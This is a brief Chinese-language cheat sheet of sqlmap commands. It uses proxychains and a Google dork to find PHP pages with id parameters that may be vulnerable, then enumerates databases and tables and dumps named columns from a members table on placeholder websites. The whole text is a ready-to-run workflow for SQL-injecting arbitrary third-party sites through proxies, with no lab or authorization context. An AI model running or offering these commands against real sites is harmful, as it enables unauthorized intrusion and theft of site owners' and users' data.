1、sqlmap -hh 查看详细说明
2、使用google
proxychains sqlmap -g " inurl:".php?id=1" "
自动发现可能有漏洞的url
3、选择上一步得到的url,探测用户名,数据库等等
sqlmap -u "http://www.xxxxxx.com/subcat.php?id=1" --dbs --tables
4、数据库,表,字段
sqlmap -u "http://www.xxxx/members.php?id=1" -D db83a -T members -C "nome ,texto" --dump